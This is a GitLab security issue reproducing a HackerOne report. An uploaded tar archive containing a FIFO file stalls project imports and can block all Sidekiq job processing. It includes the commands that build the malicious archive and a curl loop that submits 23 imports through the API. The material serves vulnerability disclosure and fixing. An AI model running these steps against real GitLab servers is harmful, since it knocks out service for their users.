:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.** **[HackerOne report #2014157](https://hackerone.com/reports/2014157)** by `zhutyra` on 2023-06-05, assigned to @ottilia_westerlund: [Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce) ## Report Tar archives can contain FIFO files. Opening a FIFO for reading blocks until some other process writes to the same FIFO. So, for example, when importing a project, if GitLab tries to read a file extracted from an uploaded Tar archive and this file is FIFO, the import will get stuck. Project import is performed by `Sidekiq`, which by default processes a maximum of 20 jobs, and in this way the processing of the job queue can be completely blocked. After extracting the archive, files are checked and symlinks are deleted, just modify this code to delete everything except regular files. ### Steps to reproduce on your GitLab instance Attached is a sample archive [import-pipe.tar.gz](https://h1.sec.gitlab.net/a/6aecf63a-34ee-47e1-8013-8208fc95980e/import-pipe.tar.gz) that can easily be created this way (on Linux): ```sh mkfifo VERSION tar czf import-pipe.tar.gz VERSION ``` #### Enable project imports If you don't have project imports enabled, you can enable it as follows: * On the top bar, select **Main menu > Admin**. * On the left sidebar, select **Settings > General**. * Expand **Visibility and access controls**. * Scroll to **Import sources**. * Enable **Gitlab Export**. #### Generate API token To import the project you will need a user with import rights, Maintainer role. We'll be importing 23 projects, so we'll automate this through the API and we'll need an API token for that. You can generate it as follows: * In the upper-right corner, select your avatar. * Select **Edit profile**. * On the left sidebar, select **Access Tokens**. * Enter a name and optional expiry date for the token. * Select the desired scopes. * api * Select **Create personal access token**. * Save the generated token. #### Import the projects Save the attached file [import-pipe.tar.gz](https://h1.sec.gitlab.net/a/6aecf63a-34ee-47e1-8013-8208fc95980e/import-pipe.tar.gz) and in the directory with this file, run this script in the bash shell: ```bash GLHOST=http://gitlab.example.com # change GLTOKEN=yourtoken # change GLPROJ=import-pipe.tar.gz for NUM in {1..23}; do echo == $NUM curl --request POST \ --header "PRIVATE-TOKEN: $GLTOKEN" \ --form "path=import-pipe-$NUM" \ --form "file=@$GLPROJ" \ "$GLHOST/api/v4/projects/import" echo; sleep 11 # 6 imports per minute done ``` The script will finish after about 4 minutes. #### Check the result Log in to the server as root and verify the results: ```bash ### there should still be 20 VERSION files (FIFOs) hanging in the temp directory find /var/opt/gitlab/gitlab-rails/shared/tmp/ -name VERSION |wc -l ### 20 ### only after writing to these files will the import complete find /var/opt/gitlab/gitlab-rails/shared/tmp/ -name VERSION |while read FNAME; do echo foo >$FNAME; done ### and the remaining 3 imports will start processing find /var/opt/gitlab/gitlab-rails/shared/tmp/ -name VERSION |wc -l ### 3 ### again only after writing to these files will the import complete find /var/opt/gitlab/gitlab-rails/shared/tmp/ -name VERSION |while read FNAME; do echo foo >$FNAME; done ### nothing left to process find /var/opt/gitlab/gitlab-rails/shared/tmp/ -name VERSION |wc -l ### 0 ``` #### Impact Blocked Sidekiq job processor. ## Attachments **Warning:** Attachments received through HackerOne, please exercise caution! * [import-pipe.tar.gz](https://h1.sec.gitlab.net/a/6aecf63a-34ee-47e1-8013-8208fc95980e/import-pipe.tar.gz) ## How To Reproduce Please add [reproducibility information] to this section: 1. 1. 1. [reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues